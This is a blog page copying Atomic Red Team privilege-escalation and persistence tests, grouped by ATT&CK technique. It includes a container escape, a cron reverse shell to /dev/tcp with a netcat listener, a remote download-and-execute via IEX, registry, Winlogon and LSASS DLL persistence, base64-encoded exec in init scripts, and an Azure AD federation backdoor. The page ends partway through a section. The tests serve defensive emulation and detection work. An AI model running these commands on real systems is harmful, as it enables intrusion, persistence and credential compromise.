URL: https://www.cnblogs.com/autopwn/p/17511222.html
皇帽讲绿帽带法技巧

ATOMIC - Privilege Escalation




T1611

Escape to Host


T1547

Boot or Logon Autostart Execution


T1547.015

Boot or Logon Autostart Execution: Login Items


T1547.014

Active Setup


T1547.010

Boot or Logon Autostart Execution: Port Monitors


T1547.009

Boot or Logon Autostart Execution: Shortcut Modification


T1547.008

Boot or Logon Autostart Execution: LSASS Driver


T1547.007

Boot or Logon Autostart Execution: Re-opened Applications


T1547.006

Boot or Logon Autostart Execution: Kernel Modules and Extensions


T1547.005

Boot or Logon Autostart Execution: Security Support Provider


T1547.004

Boot or Logon Autostart Execution: Winlogon Helper DLL


T1547.003

Time Providers


T1547.002

Authentication Package


T1547.001

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder


T1543.004

Create or Modify System Process: Launch Daemon


T1543.003

Create or Modify System Process: Windows Service


T1543.002

Create or Modify System Process: Systemd Service


T1543.001

Create or Modify System Process: Launch Agent


T1484.002

Domain Trust Modification


T1484.001

Domain Policy Modification: Group Policy Modification


T1134.005

Access Token Manipulation: SID-History Injection


T1134.004

Access Token Manipulation: Parent PID Spoofing


T1134.002

Create Process with Token


T1134.001

Access Token Manipulation: Token Impersonation/Theft


T1055

Process Injection


T1055.012

Process Injection: Process Hollowing


T1055.004

Process Injection: Asynchronous Procedure Call


T1055.003

Thread Execution Hijacking


T1055.001

Process Injection: Dynamic-link Library Injection


T1053.007

Kubernetes Cronjob


T1053.006

Scheduled Task/Job: Systemd Timers


T1053.005

Scheduled Task/Job: Scheduled Task


T1053.003

Scheduled Task/Job: Cron


T1053.002

Scheduled Task/Job: At


T1037.005

Boot or Logon Initialization Scripts: Startup Items


T1037.004

Boot or Logon Initialization Scripts: Rc.common


T1037.002

Boot or Logon Initialization Scripts: Logon Script (Mac)


T1037.001

Boot or Logon Initialization Scripts: Logon Script (Windows)

--------------------------------------------------------------------------------


T1611

ESCAPE TO HOST

 * Atomic Test #1 - Deploy container using nsenter container escape

 * Atomic Test #2 - Mount host filesystem to escape privileged Docker container


DEPLOY CONTAINER USING NSENTER CONTAINER ESCAPE

kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod --restart=Never -ti --rm --image alpine --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'


MOUNT HOST FILESYSTEM TO ESCAPE PRIVILEGED DOCKER CONTAINER

if [ ! -d #{mount_point} ]; then mkdir #{mount_point} ; mount #{mount_device} #{mount_point}; fi
echo -n "* * * * * root /bin/bash -c '/bin/bash -c echo \"\"; echo \"hello from host! " > #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "(hostname) " >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo "(id)\" >& /dev/tcp/#{listen_address}/#{listen_port} 0>&1'" >> #{mount_point}#{cron_path}/#{cron_filename}
netcat -l -p #{listen_port} 2>&1

--------------------------------------------------------------------------------


T1547

BOOT OR LOGON AUTOSTART EXECUTION

 * Atomic Test #1 - Add a driver


ADD A DRIVER

pnputil.exe /add-driver "#{driver_inf}"

--------------------------------------------------------------------------------


T1547.015

BOOT OR LOGON AUTOSTART EXECUTION: LOGIN ITEMS

 * Atomic Test #1 - Persistence by modifying Windows Terminal profile

 * Atomic Test #2 - Add macOS LoginItem using Applescript


PERSISTENCE BY MODIFYING WINDOWS TERMINAL PROFILE

mv #{settings_json_def} #{settings_json_tmp}
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/src/settings.json?raw=true" -OutFile "#{settings_json_def}"
wt.exe


ADD MACOS LOGINITEM USING APPLESCRIPT

osascript #{scriptfile}

--------------------------------------------------------------------------------


T1547.014

ACTIVE SETUP

 * Atomic Test #1 - HKLM - Add atomic_test key to launch executable as part of user setup

 * Atomic Test #2 - HKLM - Add malicious StubPath value to existing Active Setup Entry

 * Atomic Test #3 - HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number


HKLM - ADD ATOMIC_TEST KEY TO LAUNCH EXECUTABLE AS PART OF USER SETUP

New-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components" -Name "atomic_test" -Force
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "(Default)" "ART TEST" -Force
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "StubPath" "#{payload}" -Force 
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup


HKLM - ADD MALICIOUS STUBPATH VALUE TO EXISTING ACTIVE SETUP ENTRY

Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup


HKLM - RE-EXECUTE 'INTERNET EXPLORER CORE FONTS' STUBPATH PAYLOAD BY DECREASING VERSION NUMBER

Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup

--------------------------------------------------------------------------------


T1547.010

BOOT OR LOGON AUTOSTART EXECUTION: PORT MONITORS

 * Atomic Test #1 - Add Port Monitor persistence in Registry


ADD PORT MONITOR PERSISTENCE IN REGISTRY

reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam" /v "Driver" /d "#{monitor_dll}" /t REG_SZ

--------------------------------------------------------------------------------


T1547.009

BOOT OR LOGON AUTOSTART EXECUTION: SHORTCUT MODIFICATION

 * Atomic Test #1 - Shortcut Modification

 * Atomic Test #2 - Create shortcut to cmd in startup folders


SHORTCUT MODIFICATION

echo [InternetShortcut] > #{shortcut_file_path}
echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path}
#{shortcut_file_path}


CREATE SHORTCUT TO CMD IN STARTUP FOLDERS

$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk")
$ShortCut.TargetPath="cmd.exe"
$ShortCut.WorkingDirectory = "C:\Windows\System32";
$ShortCut.WindowStyle = 1;
$ShortCut.Description = "T1547.009.";
$ShortCut.Save()
 
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk")
$ShortCut.TargetPath="cmd.exe"
$ShortCut.WorkingDirectory = "C:\Windows\System32";
$ShortCut.WindowStyle = 1;
$ShortCut.Description = "T1547.009.";
$ShortCut.Save()

--------------------------------------------------------------------------------


T1547.008

BOOT OR LOGON AUTOSTART EXECUTION: LSASS DRIVER

 * Atomic Test #1 - Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt


MODIFY REGISTRY TO LOAD ARBITRARY DLL INTO LSASS - LSADBEXTPT

New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "#{dll_path}"

--------------------------------------------------------------------------------


T1547.007

BOOT OR LOGON AUTOSTART EXECUTION: RE-OPENED APPLICATIONS

 * Atomic Test #1 - Copy in loginwindow.plist for Re-Opened Applications

 * Atomic Test #2 - Re-Opened Applications using LoginHook

 * Atomic Test #3 - Append to existing loginwindow for Re-Opened Applications


COPY IN LOGINWINDOW.PLIST FOR RE-OPENED APPLICATIONS

cp #{calc_plist_path} ~/Library/Preferences/ByHost/com.apple.loginwindow.plist


RE-OPENED APPLICATIONS USING LOGINHOOK

sudo defaults write com.apple.loginwindow LoginHook #{script}


APPEND TO EXISTING LOGINWINDOW FOR RE-OPENED APPLICATIONS

FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi
echo save backup copy to /tmp/
cp ${FILE} /tmp/t1547007_loginwindow-backup.plist
echo before
plutil -p ${FILE}
echo overwriting...
#{exe_path} ${FILE} && echo after && plutil -p ${FILE}

--------------------------------------------------------------------------------


T1547.006

BOOT OR LOGON AUTOSTART EXECUTION: KERNEL MODULES AND EXTENSIONS

 * Atomic Test #1 - Linux - Load Kernel Module via insmod

 * Atomic Test #2 - MacOS - Load Kernel Module via kextload and kmutil

 * Atomic Test #3 - MacOS - Load Kernel Module via KextManagerLoadKextWithURL()

 * Atomic Test #4 - Snake Malware Kernel Driver Comadmin


LINUX - LOAD KERNEL MODULE VIA INSMOD

sudo insmod #{module_path}


MACOS - LOAD KERNEL MODULE VIA KEXTLOAD AND KMUTIL

set -x
sudo kextload #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload #{module_path}
sudo kmutil load -p #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kmutil unload -p #{module_path}


MACOS - LOAD KERNEL MODULE VIA KEXTMANAGERLOADKEXTWITHURL()

sudo #{exe_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload /Library/Extensions/SoftRAID.kext


SNAKE MALWARE KERNEL DRIVER COMADMIN

$examplePath = Join-Path $env:windir "system32\Com"; if (-not (Test-Path $examplePath)) { New-Item -ItemType Directory -Path $examplePath | Out-Null }; $exampleName = "comadmin.dat"; $exampleFullPath = Join-Path $examplePath $exampleName; $randomBytes = New-Object Byte[] 0x1000; (New-Object Random).NextBytes($randomBytes); [System.IO.File]::WriteAllBytes($exampleFullPath, $randomBytes)

--------------------------------------------------------------------------------


T1547.005

BOOT OR LOGON AUTOSTART EXECUTION: SECURITY SUPPORT PROVIDER

 * Atomic Test #1 - Modify SSP configuration in registry


MODIFY SSP CONFIGURATION IN REGISTRY

# run these in sequence
$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$SecurityPackagesUpdated = $SecurityPackages
$SecurityPackagesUpdated += "#{fake_ssp_dll}"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
 
# revert (before reboot)
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages

--------------------------------------------------------------------------------


T1547.004

BOOT OR LOGON AUTOSTART EXECUTION: WINLOGON HELPER DLL

 * Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell

 * Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell

 * Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell

 * Atomic Test #4 - Winlogon HKLM Shell Key Persistence - PowerShell

 * Atomic Test #5 - Winlogon HKLM Userinit Key Persistence - PowerShell


WINLOGON SHELL KEY PERSISTENCE - POWERSHELL

Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force



WINLOGON USERINIT KEY PERSISTENCE - POWERSHELL

Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force



WINLOGON NOTIFY KEY LOGON PERSISTENCE - POWERSHELL

New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force


WINLOGON HKLM SHELL KEY PERSISTENCE - POWERSHELL

Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force



WINLOGON HKLM USERINIT KEY PERSISTENCE - POWERSHELL

Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force


--------------------------------------------------------------------------------


T1547.003

TIME PROVIDERS

 * Atomic Test #1 - Create a new time provider

 * Atomic Test #2 - Edit an existing time provider


CREATE A NEW TIME PROVIDER

net stop w32time
Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "InputProvider" /d "1" /f
net start w32time


EDIT AN EXISTING TIME PROVIDER

net stop w32time
Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f
net start w32time

--------------------------------------------------------------------------------


T1547.002

AUTHENTICATION PACKAGE

 * Atomic Test #1 - Authentication Package


AUTHENTICATION PACKAGE

Copy-Item $PathToAtomicsFolder\T1547.002\bin\package.dll C:\Windows\System32\
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v "Authentication Packages" /t REG_MULTI_SZ /d "msv1_0\0package.dll" /f

--------------------------------------------------------------------------------


T1547.001

BOOT OR LOGON AUTOSTART EXECUTION: REGISTRY RUN KEYS / STARTUP FOLDER

 * Atomic Test #1 - Reg Key Run

 * Atomic Test #2 - Reg Key RunOnce

 * Atomic Test #3 - PowerShell Registry RunOnce

 * Atomic Test #4 - Suspicious vbs file run from startup Folder

 * Atomic Test #5 - Suspicious jse file run from startup Folder

 * Atomic Test #6 - Suspicious bat file run from startup Folder

 * Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder

 * Atomic Test #8 - Add persistence via Recycle bin

 * Atomic Test #9 - SystemBC Malware-as-a-Service Registry

 * Atomic Test #10 - Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value

 * Atomic Test #11 - Change Startup Folder - HKCU Modify User Shell Folders Startup Value

 * Atomic Test #12 - HKCU - Policy Settings Explorer Run Key

 * Atomic Test #13 - HKLM - Policy Settings Explorer Run Key

 * Atomic Test #14 - HKLM - Append Command to Winlogon Userinit KEY Value

 * Atomic Test #15 - HKLM - Modify default System Shell - Winlogon Shell KEY Value

 * Atomic Test #16 - secedit used to create a Run key in the HKLM Hive

 * Atomic Test #17 - Modify BootExecute Value


REG KEY RUN

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"


REG KEY RUNONCE

REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"


POWERSHELL REGISTRY RUNONCE

$RunOnceKey = "#{reg_key_path}"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'


SUSPICIOUS VBS FILE RUN FROM STARTUP FOLDER

Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"


SUSPICIOUS JSE FILE RUN FROM STARTUP FOLDER

Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"


SUSPICIOUS BAT FILE RUN FROM STARTUP FOLDER

Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"


ADD EXECUTABLE SHORTCUT LINK TO USER STARTUP FOLDER

$Target = "C:\Windows\System32\calc.exe"
$ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Create = $WScriptShell.CreateShortcut($ShortcutLocation)
$Create.TargetPath = $Target
$Create.Save()


ADD PERSISTENCE VIA RECYCLE BIN

reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f


SYSTEMBC MALWARE-AS-A-SERVICE REGISTRY

$RunKey = "#{reg_key_path}"
Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"


CHANGE STARTUP FOLDER - HKLM MODIFY USER SHELL FOLDERS COMMON STARTUP VALUE

New-Item -ItemType Directory -path "#{new_startup_folder}"
Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
Set-ItemProperty -Path  "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "#{new_startup_folder}"


CHANGE STARTUP FOLDER - HKCU MODIFY USER SHELL FOLDERS STARTUP VALUE

New-Item -ItemType Directory -path "#{new_startup_folder}"
Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "#{new_startup_folder}"


HKCU - POLICY SETTINGS EXPLORER RUN KEY

if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
  New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
}
Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"


HKLM - POLICY SETTINGS EXPLORER RUN KEY

if (!(Test-Path -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
  New-Item -ItemType Key -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
}
Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"


HKLM - APPEND COMMAND TO WINLOGON USERINIT KEY VALUE

$oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit");
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit-backup" -Value "$oldvalue";
$newvalue = $oldvalue + " #{payload}";
Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$newvalue"


HKLM - MODIFY DEFAULT SYSTEM SHELL - WINLOGON SHELL KEY VALUE

$oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell");
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell-backup" -Value "$oldvalue";
$newvalue = $oldvalue + ", #{payload}";
Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$newvalue"


SECEDIT USED TO CREATE A RUN KEY IN THE HKLM HIVE

secedit /import /db #{secedit_db} /cfg #{ini_file}
secedit /configure /db #{secedit_db}


MODIFY BOOTEXECUTE VALUE

if (!(Test-Path "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg")) { reg.exe export "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg" /y }
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name "BootExecute" -Value "#{registry_value}" -Type MultiString

--------------------------------------------------------------------------------


T1543.004

CREATE OR MODIFY SYSTEM PROCESS: LAUNCH DAEMON

 * Atomic Test #1 - Launch Daemon


LAUNCH DAEMON

sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}

--------------------------------------------------------------------------------


T1543.003

CREATE OR MODIFY SYSTEM PROCESS: WINDOWS SERVICE

 * Atomic Test #1 - Modify Fax service to run PowerShell

 * Atomic Test #2 - Service Installation CMD

 * Atomic Test #3 - Service Installation PowerShell

 * Atomic Test #4 - TinyTurla backdoor service w64time

 * Atomic Test #5 - Remote Service Installation CMD


MODIFY FAX SERVICE TO RUN POWERSHELL

sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
sc start Fax


SERVICE INSTALLATION CMD

sc.exe create #{service_name} binPath= #{binary_path} start=#{startup_type}  type=#{service_type}
sc.exe start #{service_name}


SERVICE INSTALLATION POWERSHELL

New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"


TINYTURLA BACKDOOR SERVICE W64TIME

copy #{dllfilename} %systemroot%\system32\
sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto
sc config W64Time DisplayName= "Windows 64 Time"
sc description W64Time "Maintain date and time synch on all clients and services in the network"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f
sc start W64Time


REMOTE SERVICE INSTALLATION CMD

sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
sc.exe \\#{remote_host} start #{service_name}

--------------------------------------------------------------------------------


T1543.002

CREATE OR MODIFY SYSTEM PROCESS: SYSTEMD SERVICE

 * Atomic Test #1 - Create Systemd Service

 * Atomic Test #2 - Create Systemd Service file, Enable the service, Modify and Reload the service.


CREATE SYSTEMD SERVICE

echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file}
echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file}
echo "Type=simple" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file}
echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
systemctl enable #{systemd_service_file}
systemctl start #{systemd_service_file}


CREATE SYSTEMD SERVICE FILE, ENABLE THE SERVICE, MODIFY AND RELOAD THE SERVICE.

cat > /etc/init.d/T1543.002 << EOF
#!/bin/bash
### BEGIN INIT INFO
# Provides : Atomic Test T1543.002
# Required-Start: $all
# Required-Stop : 
# Default-Start: 2 3 4 5
# Default-Stop: 
# Short Description: Atomic Test for Systemd Service Creation
### END INIT INFO
python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))"
EOF
 
chmod +x /etc/init.d/T1543.002
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubuntu, Kali OR CentOS" ; fi ;
systemctl enable T1543.002
systemctl start T1543.002
 
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
systemctl daemon-reload
systemctl restart T1543.002

--------------------------------------------------------------------------------


T1543.001

CREATE OR MODIFY SYSTEM PROCESS: LAUNCH AGENT

 * Atomic Test #1 - Launch Agent

 * Atomic Test #2 - Event Monitor Daemon Persistence


LAUNCH AGENT

if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;
sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}
sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}


EVENT MONITOR DAEMON PERSISTENCE

sudo cp #{script_location} #{script_destination}
sudo touch /private/var/db/emondClients/#{empty_file}

--------------------------------------------------------------------------------


T1484.002

DOMAIN TRUST MODIFICATION

 * Atomic Test #1 - Add Federation to Azure AD


ADD FEDERATION TO AZURE AD

Import-Module AzureAD
Import-Module AADInternals
 
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
 
try {
  Connect-AzureAD -Credential $Credential -ErrorAction Stop > $null
}
catch {
  Write-Host "Error: AzureAD could not connect"
  exit 1
}
 
try {
  $domain = Get-AzureADDomain -Name "#{domain_name}"
}
catch {
  Write-Host "Error: domain ""#{domain_name}"" not found"
  exit 1
}
if (-Not $domain.IsVerified) {
  Write-Host "Error: domain ""#{domain_name}"" not verified"
  exit 1
}
 
if ($domain.AuthenticationType -eq "Federated") {
  Write-Host "Error: domain ""#{domain_name}"" already federated. Try with a different domain or re-create it before."
  exit 1
}
 
$at = Get-AADIntAccessTokenForAADGraph -Credentials $Credential
if (-Not $at) {
  Write-Host "Error: AADInternals could not connect"
  exit 1
}
 
$new = ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "#{domain_name}"
if ($new) {
  Write-Host "Federation successfully added to Azure AD"
  Write-Host $new
}
else {
  Write-Host "The federation setup failed"
}
 
Write-Host "End of federation configuration."

--------------------------------------------------------------------------------


T1484.001

DOMAIN POLICY MODIFICATION: GROUP POLICY MODIFICATION

 * Atomic Test #1 - LockBit Black - Modify Group policy settings -cmd

 * Atomic Test #2 - LockBit Black - Modify Group policy settings -Powershell


LOCKBIT BLACK - MODIFY GROUP POLICY SETTINGS -CMD

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f
